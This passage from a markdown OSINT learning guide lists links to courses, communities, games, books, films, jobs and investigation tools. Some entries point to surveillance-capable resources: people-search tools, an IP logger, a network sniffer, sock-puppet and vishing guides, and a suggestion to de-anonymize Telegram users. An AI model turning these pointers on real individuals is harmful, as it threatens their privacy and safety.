[Python for OSINT 21 days](https://github.com/cipher387/python-for-OSINT-21-days) - [Googledorking](https://tryhackme.com/room/googledorking) + [dorksearch.com](https://dorksearch.com/) - [Searchlightosint](https://tryhackme.com/room/searchlightosint) - [Shodan](https://tryhackme.com/room/shodan) - [Geolocatingimages](https://tryhackme.com/room/geolocatingimages) - [Instruments-on-the-radio-waves](https://telegra.ph/Instruments-on-the-radio-waves-02-01) + [websdr.org](https://websdr.org) + [try 😅](http://websdr.ewi.utwente.nl:8901/?tune=4625) - [Somesint](https://tryhackme.com/room/somesint) - [osintframework.com](https://osintframework.com) - [OSINT At Home YouTube Playlist](https://www.youtube.com/playlist?list=PLrFPX1Vfqk3ehZKSFeb9pVIHqxqrNW8Sy) - [myosint.training](https://www.myosint.training/) - [Awesome Cyber Skills](https://github.com/joe-shenouda/awesome-cyber-skills) - [Awesome Maps](https://github.com/simsieg/awesome-maps) Here is a very good brain-stretching game will help to train associative thinking - a very important skill for anyone in [OSINT](https://twitter.com/hashtag/OSINT?src=hashtag_click): - [Wikipedia:Wiki Game](https://en.wikipedia.org/wiki/Wikipedia:Wiki_Game) When I was young we played «5 steps till Ragnarok» - the goal was to find the page about this myth in 5 steps (5 clicks) from any random Wikipedia page! 🙂 **Follow top OSINT specialists:** - [twitter.com/UKOSINT](https://twitter.com/UKOSINT) - news, tools, jokes - [twitter.com/dutch_osintguy](https://twitter.com/dutch_osintguy) - famous specialist, speaker - [twitter.com/jakecreps](https://twitter.com/jakecreps) - posts awesome tools every Thursday - [twitter.com/OSINTtechniques](https://twitter.com/OSINTtechniques) - follow the Digital Bread Crumbs - [The Sleuth Sheet](https://medium.com/the-sleuth-sheet) - [OSINT Essentials](https://osintessentials.medium.com/) - [Sector035](https://medium.com/@sector035) - Week in OSINT - [Igor S. Bederov](https://medium.com/@ibederov_en) - Sherlock Holmes of the digital age… - [twitter.com/OSINTHK](https://twitter.com/OSINTHK) - volunteers using OSINT - [A global OSINT Community](https://osintfr.com/en/home/) - OSINT Community from France - [twitter.com/OSINT_Research](https://twitter.com/OSINT_Research) - tools and awesome data - [twitter.com/OSINTtechniques](https://twitter.com/OSINTtechniques) - tools and awesome data - [twitter.com/OsintJobs](https://twitter.com/OsintJobs) - jobs in OSINT - [www.reddit.com/r/OSINT](https://www.reddit.com/r/OSINT) - the biggest thematic subReddit - [Channels about OSINT, Hacking, Security and so on](https://telegra.ph/Channels-about-OSINT-Hacking-Security-and-so-on-04-19) **More Resources:** > [In addition to its traditional function of enabling less miscalculated decisions,](https://www.researchgate.net/publication/331073990_Digital_Open_Source_Intelligence_and_International_Security_A_Primer) the audience of modern intelligence is growing beyond state or corporation leadership, and is expanding to the public. It is no longer a mere warning mechanism, but also a know-how reservoir and improvisation pool to resolve matters in times of unexpected crises. - [Awesome OSINT + Crypto](https://github.com/aaarghhh/awesome_osint_criypto_web3_stuff) - [Google Hacking](https://seckrd.com/google-hacking) - [GOSI: GIAC Open Source Intelligence](https://www.giac.org/certification/open-source-intelligence-gosi) - [SEC487: Open-Source Intelligence (OSINT) Gathering and Analysis](https://www.sans.org/cyber-security-courses/open-source-intelligence-gathering/) - [Inteltechniques.net](https://www.inteltechniques.net/) - [IT security lecture](https://github.com/bkimminich/it-security-lecture/) - [r4ven Tool](https://github.com/spyboy-productions/r4ven) - [Unredacter](https://github.com/BishopFox/unredacter) - [forensicdots.de](https://www.forensicdots.de/) - [Meta-secret App](https://github.com/meta-secret) - [Image Research OSINT](https://github.com/cqcore/Image-Research-OSINT) - [15 tools you should know as a security analyst](https://osintteam.blog/15-tools-you-should-know-as-a-security-analyst-f95007e94d99) - [Portable Secret App](https://mprimi.github.io/portable-secret/) - [Open Source Intelligence Techniques](https://inteltechniques.com/book1.html) - [The Internet Intelligence & Investigation Handbook](https://www.amazon.com/Internet-Intelligence-Investigation-Handbook-practical/dp/B096TJMV7J) - [NATO OSINT HandBook](https://github.com/lawsecnet/OPSEC/blob/master/NATO%20OSINT%20Handbook%20v1.2%20-%20Jan%202002.pdf) - [osintnewsletter.com](https://osintnewsletter.com/) - [Geolocation OSINT](https://github.com/cqcore/Geolocation-OSINT) - [geodetective.io](https://geodetective.io/) - [Yet another awesome OSINT book](https://t.me/osintkanal/2049) - [Social Media OSINT](https://github.com/cqcore/Social-Media-OSINT) - [Fascinating Search Engines That Search for Faces](https://www.makeuseof.com/tag/3-fascinating-search-engines-search-faces/) - [OSINT Tools MegaList](https://pastebin.com/z0FUgiGb) - [Future of OSINT: People Searching with ChatGPT](https://dorksearch.com/blog/future-of-osint-people-searching/) - [Geolocation: At The Retail Park](https://nixintel.info/osint/geolocation-at-the-retail-park/) **Tools (AI, ChatGPT, ML, Others):** > [In recent years, public interest in open-source intelligence gathering and analysis](https://www.sans.org/webcasts/atmic-talk-osint-mind-state-online-investigations-114115/) has increased exponentially. As this interest has grown, more and more OSINT investigations have been relying on tools and automation, leaving the analysis process behind. You should consider OSINT a thought process. The "OSINT state of mind" is key for keeping track of your investigative steps, picking the right tools and sources, analyzing the data, and reporting to generate actionable intelligence! - [OSINT Tools Map](https://metaosint.github.io/chart) - [Sherlock](https://github.com/sherlock-project/sherlock) - [gpt.censys.io](https://gpt.censys.io/) - [ChatGeoPT](https://github.com/earth-genome/ChatGeoPT) - [ChatGPT for OSINT: Example](https://t.me/osintkanal/2009) | Tip: Use [deepl.com](https://www.deepl.com/translator) - [Emoji OSINT](https://www.dutchosintguy.com/post/cryptography-osint-can-you-read-emoji) - [Advangle](http://advangle.com/) - [searchcode.com](https://searchcode.com/) - [dorkgpt.com](https://www.dorkgpt.com/) - [OSINT & ChatGPT: 103 Ideas](https://t.me/irozysk/9377) - [OSINT + AI](https://github.com/jiep/offensive-ai-compilation) - [OSINT - SAN](https://github.com/Bafomet666/OSINT-SAN) - [OSINT Buddy](https://github.com/jerlendds/osintbuddy) - [ChatGPT: The AI-Powered Secret Weapon for OSINT](https://blog.gopenai.com/chatgpt-the-ai-powered-secret-weapon-for-osint-133a68d8302e) - [Do not treat a tool like a silver buller for all task!](https://osintessentials.medium.com/the-one-osint-tool-you-must-have-to-supercharge-your-investigations-94f5015b6318) - [The New OSINT Cheat Code: ChatGPT](https://medium.com/the-sleuth-sheet/the-new-osint-cheat-code-chatgpt-cd54c190fa11) - [Harnessing the Power of ChatGPT for OSINT: A Practical Guide to Your AI OSINT Assistant](https://hackernoon.com/harnessing-the-power-of-chatgpt-for-osint-a-practical-guide-to-your-ai-osint-assistant) - [Awesome Free ChatGPT](https://github.com/LiLittleCat/awesome-free-chatgpt) - [Offensive AI](https://github.com/jiep/offensive-ai-compilation) - [Bitcoin Investigation Manual AML](https://www.amazon.com/Bitcoin-Investigation-Manual-AML-Money-Laundering/dp/1077484070) # Choosing a Pathway to Follow... Some will enjoy [analyzing images](https://29a.ch/photo-forensics/#forensic-magnifier), [satellite images](https://spectator.earth/), calculating time and place from [the angle of shadows from a photo](https://www.suncalc.org/#/40.1789,-3.5156,3/2022.05.05/12:15/1/3), or measuring mountain [peak size](https://www.peakfinder.org/) in order to perform private detective investigations. Or, let's say, [doing OSINT in crypto](https://graph.org/TX-Analysis-tools-04-19), for example, in which case your motivation will be money and self-fulfillment... Or [searching for rare stories](https://www.atlasobscura.com/articles/buying-volcanoes-robert-ripley-paricutin-whakaari.amp) even! [Read my channel if you like this topic](https://t.me/officer_cia)... Or someone can even get into [AD-INT](https://medium.com/@ibederov_en/mac-address-osint-e539504ae925) which is growing day-by-day right now. For GEOINT skills training I suggest checking [geoguessr.com](https://geoguessr.com/) & [whereami.io](https://whereami.io/). **Just take a look at this awesome Mind-Map:** - [Click on me!](http://files.mtg-bi.com/MindMap.jpg) **Explore data terminals:** - [Open-Source Intelligence (OSINT) Reconnaissance](https://z3r0trust.medium.com/open-source-intelligence-osint-reconnaissance-9f0bafd672b2) - [A collection of several hundred online tools for OSINT](https://github.com/cipher387/osint_stuff_tool_collection) - [This page is for anyone who loves open source investigating](https://start.me/p/DPYPMz/the-ultimate-osint-collection) - [Start.me + OSINT](https://start.me/p/Pwy0X4/osint-inception) - [Open-Source Intelligence (OSINT) in 5 Hours - Full Course - Learn OSINT!](https://youtu.be/qwA6MmbeGNo) - [Follow!](https://twitter.com/Sector035) - [myosint.training/courses/](https://myosint.training/courses/) - [Comparing OSINT Typosquatting Tools like DNSTwist, DNSRazzle against Bolster’s Typosquatting monitoring](https://securityboulevard.com/2022/02/comparing-osint-typosquatting-tools-like-dnstwist-dnsrazzle-against-bolsters-typosquatting-monitoring/) - [* What’s that font?](https://osintessentials.medium.com/wtf-be0de2230ed2) - [OSINT Cheatsheet](https://thekaiz3n.com/cheatsheet/2022/01/12/osint.html) - [The Application of Abductive and Retroductive Inference for the Design and Analysis of Theory-Driven Sociological Research](https://journals.sagepub.com/doi/10.5153/sro.2819) - [Abduction as an Aspect of Retroduction](http://www.commens.org/encyclopedia/article/chiasson-phyllis-abduction-aspect-retroduction) - [Abduction as an Aspect of Retroduction - 2](https://www.degruyter.com/document/doi/10.1515/semi.2005.2005.153-1-4.223/html?lang=en) - [Abductive reasoning](https://en.wikipedia.org/wiki/Abductive_reasoning) You may even want to de-anonymize telegram users ([read this channel](https://t.me/ibederov_en)) or, conversely, join [counter-OSINT](https://github.com/soxoj/counter-osint-guide-en) bros. But in doing so, I urge you not to forget the key skills of information retrieval, information analytics, and information application... <details> <summary>Expand</summary> <br /> - [Counter OSINT Guide](https://github.com/soxoj/counter-osint-guide-en) - [HUMINT VS Social Engineering Resources](https://telegra.ph/HUMINT-VS-Social-Engineering-Resources-03-24) - [From oblivion to illumination. Part 1 | On the line of creativity and defense](https://mirror.xyz/0xc34B1730BA53abD717a1E57A358F39C046053581/Ra_UVvUwOrO5W56k2QpP4jKhYAGMhsNnfvwrdKWQ1EI) - [How to learn anything.](https://twitter.com/sahilbloom/status/1662453471608446976) </details> I'll highlight some basic advice for you - evaluate information according to different criteria, always know your "base settings" - it's good for the mental health, the things you find shouldn't ruin your foundations! Practice it, do it in your daily life, apply OSINT where it seems un-obvious like mentioned below: - [5 Ways OSINT Can Help Your Career! - Knowmad OSINT](https://knowmad-osint.com/5-ways-osint-can-help-your-career/) - [The Art of Attack](https://books.google.nl/books?id=j583EAAAQBAJ&pg=PT10&lpg=PT10&dq=how+to+think+like+an+osint+mindset&source=bl&ots=JeHrgDkP0q&sig=ACfU3U0UC_u94QQs3wdSXmIt2VsZcJNcyw&hl=en&sa=X&ved=2ahUKEwjIvNrwlcj3AhXD0qQKHZfUA50Q6AF6BAgiEAM#v=onepage&q=how%20to%20think%20like%20an%20osint%20mindset&f=false) - [Ontology Population for Open-Source Intelligence](https://ceur-ws.org/Vol-2161/paper27.pdf) - [Cryptography & OSINT - The fundamentals](https://www.dutchosintguy.com/post/cryptography-osint-the-fundamentals) - [Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)](https://null-byte.wonderhowto.com/how-to/use-zero-width-characters-hide-secret-messages-text-even-reveal-leaks-0198692/) - [OSINT: username search tool](https://www.secjuice.com/osint-username-search-tool/) - [Geolocation Challenge Writeup](https://osintteam.blog/geolocation-challenge-writeup-1cd5d5aa299f) - [All About Web Recon & OSINT](https://github.com/pr0xh4ck/web-recon) # Immersive & Gamified Learning: Games (b) Join communities, of course and chat, chat! Below I've only mentioned English-speaking communities but there are also local ones, do some research on your own. I’m 100% sure in you! You will succeed! Do you like to hang out with friends? If so, then try playing Dozor or Encounter (or any NightGame based on codebreaking or geolocation or Escapology or Lock-Picking) together! - [DozoR Team Night Game](https://en.wikipedia.org/wiki/Dozor) - [Codebreaking](https://en.m.wikipedia.org/wiki/Codebreaking) - [GeoCaching](https://en.m.wikipedia.org/wiki/Geocaching) - [Escapology](https://en.wikipedia.org/wiki/Escapology) - [Lock-Picking](https://www.art-of-lockpicking.com/how-to-pick-a-lock-guide/) **Check out:** - [Ingress](https://www.ingress.com/) - [Geocaching](https://education.nationalgeographic.org/resource/geocaching/) - [Escapology](https://www.escapology.com/en) - [Best Tool For Information Gathering 🔎](https://github.com/Moham3dRiahi/Th3inspector) - [Awesome Intelligence](https://github.com/ARPSyndicate/awesome-intelligence) **OSINT-Games:** - [kasescenarios.com](https://kasescenarios.com/) - [Sourcing.games](https://sourcing.games/) - [OSINT Exercise #018](https://gralhix.com/list-of-osint-exercises/osint-exercise-018/) - [osint.games](https://www.osint.games/) - [spyingchallenge.com](http://spyingchallenge.com/) - [10 Beginner OSINT CTF Solutions](https://geckosint.medium.com/10-beginner-osint-ctf-solutions-ae89e557a4b) - [More OSINT CTFs](https://warnerchad.medium.com/osint-ctfs-9993129c10c7) - [OSINT Challenges List - Reddit](https://www.reddit.com/r/OSINT/comments/vu9i43/looking_for_osint_challenges_ctfs/) - [2 great OSINT Training Tools](https://nixintel.info/osint/two-great-osint-training-tools/) - [OSINT-Related Games - Reddit](https://www.reddit.com/r/OSINT/comments/i62fhp/osint_related_games/) - [The 10 best location-based games](https://www.digitaltrends.com/gaming/best-location-based-gps-games/) - [7 Geolocation Games to Get You Exploring the Outdoors](https://www.samsung.com/uk/explore/entertainment/7-geolocation-games-to-get-you-exploring-the-outdoors/) - [Location-based game](https://en.wikipedia.org/wiki/Location-based_game) - [What is a Fox Hunt in Ham Radio?](https://hamradioplanet.com/what-is-a-fox-hunt-in-ham-radio/) - [9 Virtual Games to Play When You Can't Be Together](https://www.realsimple.com/work-life/entertainment/virtual-games) Carefully study these resources and come back to them as you journey through the world of the hornets, don't forget the roots. This article does not answer questions, but rather raises some rhetorical questions to encourage you to think about something! <details> <summary>Expand</summary> <br /> - [Comprehensive Counter OSINT](https://github.com/soxoj/counter-osint-guide-en) - [Counter OSINT](https://github.com/CScorza/OSINTAnonymous) - [Open Source Intelligence Investigation: From Strategy to Implementation](https://www.researchgate.net/publication/321531302_Open_Source_Intelligence_Investigation_From_Strategy_to_Implementation) - [Intelligence in the internet age: The emergence and evolution of Open Source Intelligence (OSINT)](https://www.sciencedirect.com/science/article/abs/pii/S0747563211002585) - [A Guide to Open-Source Intelligence (OSINT)](https://greydynamics.com/a-guide-to-open-source-intelligence-osint/) - [Intelligent evidence: Using open source intelligence (OSINT) in criminal proceedings](https://www.researchgate.net/publication/309015913_Intelligent_evidence_Using_open_source_intelligence_OSINT_in_criminal_proceedings) - [The Intelligence Cycle: Generating OSINT from OSINF](https://www.skopenow.com/news/the-intelligence-cycle-creating-osint-from-osinf) </details> Since this is an atypical guide, I think it's worthwhile to offer you a list of TV shows and movies that I think involve OSINT in one way or another: - [SEARCHING](https://youtu.be/3Ro9ebQxEOY) - [The Most Hated Man on the Internet](https://youtu.be/ySFpxEdKxMw) - [Why Did You Kill Me?](https://youtu.be/QEXV8Rif8Vc) - [Web of Make Believe: Death, Lies and the Internet](https://youtu.be/Z_l702HNPAA) - [Don't F**k With Cats: Hunting an Internet Killer](https://youtu.be/x41SMm-9-i4) - [Reddit Ruined Their Lives: The Innocent Victims Of Internet Justice](https://youtu.be/hi14dP5Rdm0) - [Cyber Hell: Exposing an Internet Horror](https://youtu.be/hpceNxQASKw) - [Who Am I - Kein System ist sicher](https://www.imdb.com/title/tt3042408/) - [The History of Analog Horror](https://youtu.be/-I_4ph-L19U) - [Dark Web: Cicada 3301](https://www.imdb.com/title/tt8110246/) - [Movie 43 (LOL)](https://youtu.be/A9fBCkwDW8c) - [Mr. Robot](https://www.imdb.com/title/tt4158110/) - [Open Windows](https://m.imdb.com/title/tt2409818/) - [Män som hatar kvinnor](https://m.imdb.com/title/tt1132620/) **References:** > [Open Source Intelligence, commonly referred to as OSINT,](https://www.skopenow.com/news/osintforgood-the-philanthropic-application-of-osint) is the collection, collation, and analysis of publicly available information. OSINT is a tradecraft developed in the national security sector that has now expanded through a range of sectors, including law enforcement, journalism, corporate security, academic research, and the legal sector. OSINT can also be used to support charitable causes! - [Any cool movies related to OSINT?](https://www.reddit.com/r/OSINT/comments/owxp7r/any_cool_movies_related_to_osint/) - [OSINT Movies List](https://twitter.com/AllForOsint/status/1581244439271350272) - [OSINT Movie Time for the Holidays](https://medium.com/@sector035/osint-movie-time-for-the-holidays-7a5f74f18f44) - [The best films about OSINT](https://medium.com/@ibederov_en/the-best-films-about-osint-5c3ab580f56) - [Intelligence Television and Movies About Spies, Spying, Intelligence and Espionage](https://www.intelligence101.com/my-favourite-intelligence-television-and-movies-about-spies-spying-intelligence-and-espionage/) - [DOD film list – spreadsheet version](https://www.spyculture.com/dod-film-list-spreadsheet-version/) - [Week in OSINT 2020-12](https://sector035.nl/articles/2020-12) - [ARG SubReddit](https://www.reddit.com/r/ARG/) - [OSINT SubReddit](https://www.reddit.com/r/OSINT/) - [Blockchain OSINT](https://www.forensicxs.com/blockchain-osint-decentraland/) - [John Doe Strikes Again](https://hamzaharooon.medium.com/john-doe-strikes-again-n00bzctf-osint-d2122d54c508) - [Measurement and Signature Intelligence (MASINT)](https://irp.fas.org/program/masint.htm) - [One Search To Rule Them All – Boolean Searches For Images](https://nixintel.info/osint/one-search-to-rule-them-all-boolean-searches-for-images/) - [SOC Puppet Creation Guide](https://medium.com/the-sleuth-sheet/soc-puppet-creation-guide-888768dce96e) - [The Three Types of Intelligence for Threat Intelligence: A Comprehensive Guide](https://medium.com/the-sleuth-sheet/the-three-types-of-intelligence-for-threat-intelligence-a-comprehensive-guide-e8bbf1f26164) - [Unmasking OSINT: A Data Aggregation Journey](https://medium.com/@VEEXH/unmasking-osint-a-data-aggregation-journey-14bea88eb045) **OSINT Bookshelf:** - [My recently read OSINT & security books – recommendations](https://www.osintme.com/index.php/2021/04/30/my-recently-read-osint-security-books-recommendations/) - [geodetective.io Training](https://geodetective.io/) - [The Open Source Intelligence Analysis Bookshelf](https://medium.com/the-sleuth-sheet/the-open-source-intelligence-analysis-bookshelf-942dc05a16bd) - [7 OSINT Books Every Analyst Should Read](https://www.liferaftinc.com/blog/7-osint-books-every-analyst-should-read?hs_amp=true) - [Books by Michael Bazzell](https://inteltechniques.com/book1.html) - [What to read to understand intelligence and espionage](https://www.wgu.edu/career-guide/information-technology/osint-career.html#openSubscriberModal) - [The Official CIA Manual of Trickery and Deception — H. Keith Melton, Robert Wallace (2009)](https://www.bokus.com/bok/9780061943331/official-cia-manual-of-trickery-and-deception/) & [Link](https://www.google.se/books/edition/The_Official_CIA_Manual_of_Trickery_and/LbrzMtkyCGUC?hl=ru&gbpv=1&dq=inauthor:%22H.+Keith+Melton%22&printsec=frontcover) & [Link2](https://www.bokus.com/bok/9780061943331/official-cia-manual-of-trickery-and-deception/) - [Offensive OSINT Tools](https://github.com/wddadk/Offensive-OSINT-Tools) - [Spycraft](https://books.google.se/books/about/Spycraft.html?id=eJg0WV6sGlEC&redir_esc=y) & [Link](https://www.google.se/books/edition/Spycraft/RHWH7gVIO9cC?hl=ru&gbpv=1&dq=inauthor:%22H.+Keith+Melton%22&printsec=frontcover) - [Ultimate Spy](https://www.google.se/books/edition/Ultimate_Spy/EObtBgAAQBAJ?hl=ru&gbpv=1&dq=inauthor:%22H.+Keith+Melton%22&printsec=frontcover) - [Bestselling Books by Kevin Mitnick](https://www.mitnicksecurity.com/bestselling-books-by-kevin-mitnick) **Zettelkasten Method:** - [Zettelkasten Method With Obsidian- How to Take Smart Notes](https://beingpax.medium.com/zettelkasten-method-with-obsidian-how-to-take-smart-notes-with-examples-cdaf348febbd) - [Setting Up a Zettelkasten in Obsidian: More Than a Note-Taking App](https://facedragons.com/productivity/setting-up-a-zettelkasten-in-obsidian/) - [obsidian-zettelkasten](https://mattgiaro.com/obsidian-zettelkasten/) - [Getting started with Zettelkasten](https://obsidian.rocks/getting-started-with-zettelkasten-in-obsidian/) - [Awesome OSINT](https://github.com/jivoi/awesome-osint) - [OSINT Guide](https://github.com/drull1000/OSINT-guide) # Work: A-Z I would see it as learning a foreign language. Okay, you have learned it and come to a country where it is spoken to live. But everyone there knows this language... So it's important to know something else in addition. Typically, it is necessary to have writing skills, interact well with people, or be a lawyer. With all said, different approaches require different skills and mind-sets! > Keep in mind that OSINT is NOT a "sort of a [front-running/tailgating](https://www.investopedia.com/terms/f/frontrunning.asp) or scalping but in real life"! <details> <summary>Expand</summary> <br /> - ["There's No Such Thing As Open Source Intelligence"](https://threadreaderapp.com/thread/1633909123988242438.html) - [How to Become an Open-Source Intelligence (OSINT) Investigator](https://www.wgu.edu/career-guide/information-technology/osint-career.html#close) - [Actually a great book about attacks & defenses](https://www.amazon.com/Network-Attacks-Defenses-Hands-Approach-ebook/dp/B00A8SN8WQ) - [OSINT Guide – Open Source Intelligence](https://www.osintguide.com/2023/01/04/start-a-consulting-business-as-an-osint-expert/) - [The Art of Proactive Defense: Mastering Threat Hunting with OSINT Tools](https://medium.com/@mohitdeswal_35470/the-art-of-proactive-defense-mastering-threat-hunting-with-osint-tools-336683d6d53b) - [The Missing Semester of Your OSINT Education](https://medium.com/the-sleuth-sheet/the-missing-semester-of-your-osint-education-60b7bd48b7e9) - [OSINT For Searching People](https://docs.google.com/spreadsheets/d/1JxBbMt4JvGr--G0Pkl3jP9VDTBunR2uD3_faZXDvhxc/edit#gid=1978517898) - [AaronCTI's OSINT Resource Collection](https://docs.google.com/spreadsheets/d/1klugQqw6POlBtuzon8S0b18-gpsDwX-5OYRrB7TyNEw/htmlview) </details> **Work:** - [anonfriendly.com](http://anonfriendly.com/) - [osintjobs](https://twitter.com/osintjobs) - [I'll show you how to make money using OSINT](https://0xtechrock.gumroad.com/) - [Python for OSINT 21 days](https://github.com/cipher387/python-for-OSINT-21-days) - [osintjobs.sociallinks.io](https://osintjobs.sociallinks.io/) - [On-Chain Investigations Tools List](https://github.com/OffcierCia/On-Chain-Investigations-Tools-List) - [How to find a job in Web3?](web.archive.org/web/20220618210743/https://twitter.com/_prestwich/status/1538267150917308416) - [www.jobprotocol.xyz](https://www.jobprotocol.xyz/) & try [HR games](https://sourcing.games/)! - Due Diligence - [Join an already existing crew...](https://osintfr.com/en/our-osinters-are-talented/) - Journalism - SMM - [AML/Crypto Investigations](https://github.com/OffcierCia/On-Chain-Investigations-Tools-List) - [strategytribe.io](https://strategytribe.io) - [Part-time tasks](https://telegra.ph/Scamfari-04-28) # External Data **More tools (random) to use in work:** - [mullvad.net/en/browser](https://mullvad.net/en/browser) - [TinyCheck](https://github.com/KasperskyLab/TinyCheck) - [lampyre.io](https://lampyre.io/) - [osintui](https://github.com/wssheldon/osintui) - [Detect.Expert](https://Detect.Expert) - [OSINT-Browser-Extensions](https://github.com/cqcore/OSINT-Browser-Extensions) - [cylect.io](https://cylect.io/) - [tazeros.com/webanalytics](https://tazeros.com/webanalytics) - [dorkgenius.com](https://dorkgenius.com) - [X-osint](https://github.com/TermuxHackz/X-osint) - [meta-webtools.com](https://meta-webtools.com/) - [Venatorbrowser](https://t.me/venatorbrowser) - [app.shadowmap.org](https://app.shadowmap.org/) - [dnstwist](https://github.com/elceef/dnstwist) - [Automated Website Takedown](https://bolster.ai/automated-website-takedown) - [OSINT+ChatGPT PDF](https://t.me/osintil/332) - [GVision](https://github.com/GONZOsint/gvision?s=35) **Specific (to be updated):** > **According to [GoldenOwl](https://osintteam.blog/safeguarding-osinters-shielding-against-disinformation-manipulation-dfbbfbf1db08):** As the battle against disinformation intensifies, OSINT practitioners must be vigilant in protecting themselves from manipulation. By adopting a critical mindset, diversifying information sources, verifying social media information, utilizing fact-checking tools, staying updated on disinformation techniques, collaborating with trusted communities, educating others, [maintaining ethical standards](https://osintteam.blog/safeguarding-osinters-shielding-against-disinformation-manipulation-dfbbfbf1db08), and cross-checking information, OSINTers can fortify themselves against manipulation and uphold the integrity of their research. - [ChatGPT + OSINT](https://m.youtube.com/watch?v=L5OlYdCWzRs&feature=youtu.be) - [Bonus OSINT Twitter Crypto toolset](https://telegra.ph/Bonus-OSINT-Twitter-Crypto-toolset-04-15) - [Awesome OSINT Web3](https://github.com/aaarghhh/awesome_osint_criypto_web3_stuff) - [tgscanrobot](https://t.me/tgscanrobot) - [velociraptor.app](https://docs.velociraptor.app) - [Web3/NFT OSINT](https://twitter.com/fuzzinglabs/status/1676226856553521153) - [maigret_osint_bot](https://t.me/maigret_osint_bot) - [telesint_bot](https://t.me/telesint_bot) - [seekr tool](https://github.com/seekr-osint/seekr) - [Data Journalism Resources](https://github.com/r3mlab/datajournalism-resources) - [Digital Forensics Guide](https://github.com/mikeroyal/Digital-Forensics-Guide) - [Twitter to TG bot](https://t.me/TwttrToTG_Bot) - [Bellingcat hackathon - stratosphere Project](https://github.com/elehcimd/stratosphere) - [osint-Brazil](https://github.com/osintbrazuca/osint-brazuca) - [spiderfoot](https://github.com/smicallef/spiderfoot) - [Awesome TG channel](https://t.me/osintil) - [Inpaint-Anything](https://github.com/geekyutao/Inpaint-Anything) - [metaosint.github.io](https://metaosint.github.io/chart) - [Maltego Transforms List](https://github.com/cipher387/maltego-transforms-list) - [OSINT open-source tools catalogue](https://github.com/HowToFind-bot/osint-tools) - [Template for new OSINT command-line tools](https://github.com/soxoj/osint-cli-tool-skeleton) - [Top OSINT sources and vishing pretexts from DEF CON’s social engineering competition](https://medium.com/@chris.kirsch/top-osint-sources-and-vishing-pretexts-from-def-cons-social-engineering-competition-8e08de4c8ea8) **Awesome articles (external):** > [As practice shows](https://medium.com/@ibederov_en/military-intelligence-using-osint-methods-4aae1df2d812), modern armed conflicts require new approaches to organizing the collection and analysis of open data, which we operate within the framework of OSINT. Be careful with it and think twice before acting. - [Using ddg.gg for OSINT](https://www.ghacks.net/2023/04/24/duckduckgo-disables-most-search-filters-from-search/?amp) - [cybdetective.substack.com](https://cybdetective.substack.com) - [Uncovering Hidden Connections: Using Maltego Holehe to Map Out a Person’s Digital Footprint](https://medium.com/@philipbcase/uncovering-hidden-connections-using-maltego-holehe-to-map-out-a-persons-digital-footprint-90914d6bcbff) - [Espionage PDF](https://t.me/irozysk/9243) - [Hacktoria — Human Traffickers](https://medium.com/@wirec47/hacktoria-human-traffickers-b9bb00638c6a) - [Password OSINT](https://viruszzwarning.medium.com/password-osint-fc4fd750ea8c) - [Using AI to Develop Realistic Sock Puppet Accounts](https://www.raebaker.net/blog/using-ai-to-develop-realistic-sock-puppet-accounts) - [ARCHIVING & OSINT](https://latenightafa.noblogs.org/archiving-and-osint/) - [Awesome OSINT](https://github.com/jivoi/awesome-osint) - [Awesome Telegram OSINT](https://github.com/ItIsMeCall911/Awesome-Telegram-OSINT) - [Visualizing Darknet](https://medium.com/@cosmograph.app/visualizing-darknet-6846dec7f1d7) - [Open Source Intelligence: The Beginners’ Guide to OSINT](https://www.liferaftinc.com/blog/the-beginners-guide-to-osint) - [DarkNet OSINT Guide](https://medium.com/the-sleuth-sheet/darknet-osint-guide-984f68fb7ab3) - [Beginners Field Guide: Where & How to Learn OSINT](https://medium.com/the-sleuth-sheet/beginners-field-guide-where-how-to-learn-osint-bd2e11469f31) - [OPEN SOURCE INTELLIGENCE TOOLS AND RESOURCES HANDBOOK 2020](https://i-intelligence.eu/uploads/public-documents/OSINT_Handbook_2020.pdf) - [Information Operations Recognition: from Nonlinear Analysis to Decision-making](https://arxiv.org/pdf/1901.10876.pdf) - [OSINT Analysis of the TOR Foundation](https://arxiv.org/pdf/1803.05201.pdf) - [Top 10 OSINT Tools for Nickname Investigation](https://medium.com/@ibederov_en/my-top-10-osint-tools-for-nickname-investigation-40e292fa5c84) **Some outstanding tools:** > [Remember, Your task for this](https://medium.com/@ronkaminskyy/from-zero-to-sherlock-the-ultimate-osint-adventure-5f9d8c45ae2) final step is to make a plan for maintaining and improving your OSINT skills. Choose some resources for continuous learning, find some challenges to participate in, and consider joining an OSINT community. Lastly, review your ethical guidelines to ensure you are always working responsibly and respectfully. - [Ron Kaminsky](https://medium.com/@ronkaminskyy/from-zero-to-sherlock-the-ultimate-osint-adventure-5f9d8c45ae2) - [datashare.icij.org](https://datashare.icij.org) - [Pinpoint](https://journaliststudio.google.com/pinpoint/collections) - [dtsearch.com](https://www.dtsearch.com/) - [Venator](https://t.me/venatorbrowser) - [A next-generation crawling and spidering framework](https://github.com/projectdiscovery/katana) - [Start.me](https://about.start.me/) - [dorksearch.com](https://dorksearch.com) - [E4GL30S1NT](https://github.com/C0MPL3XDEV/E4GL30S1NT) - [Advangle](http://advangle.com) - [Awesome-chatgpt](https://github.com/sindresorhus/awesome-chatgpt) - [obsidian.md](https://obsidian.md/) - [dorkgenius.com](https://dorkgenius.com) - [canarytokens.org](https://canarytokens.org/generate) - [iplogger.org](https://iplogger.org) - [Universal Search](https://t.me/UniversalSearchRobot) - [Intercepter-NG](http://sniff.su/) - [metadata2go.com](https://www.metadata2go.com) - [suip.biz](https://suip.biz/) **In-Depth (external):** > **According to [Alessandra Adina](https://medium.com/@alessandraadina/how-to-do-cyber-reconnaissance-a-guide-to-osint-for-non-tech-professionals-da6c7db48699):** The intelligence cycle represents the process of developing raw information into actionable intelligence. This process can enable decision-makers to take appropriate actions based on their findings. While different organisations use variations on different intelligence cycles, a popular one is a five-step cycle: **Planning, Gathering, Analyzing, Dissemination, and Feedback.** - [OSINT: How to find information on anyone](https://osintteam.blog/osint-how-to-find-information-on-anyone-5029a3c7fd56) - [OSINT — Beginner’s Guide (Part 1)](https://medium.com/@Aardwarewolf/what-is-osint-part-1-91aaa3890643) - [OSINT: FOUNDATIONS](https://i-intelligence.eu/courses/osint-foundations) - [How to Use OSINT to Detect Data Leaks and Breaches](https://www.liferaftinc.com/blog/how-to-use-osint-to-detect-data-leaks-and-breaches) - [Introduction to OSINT](https://infosecwriteups.com/introduction-to-osint-2c92597988d1) - [How to Improve Cyber Attack Detection Using Social Media?](https://www.geeksforgeeks.org/how-to-improve-cyber-attack-detection-using-social-media/) - [Are you leaking information on the web? Use these tools to find 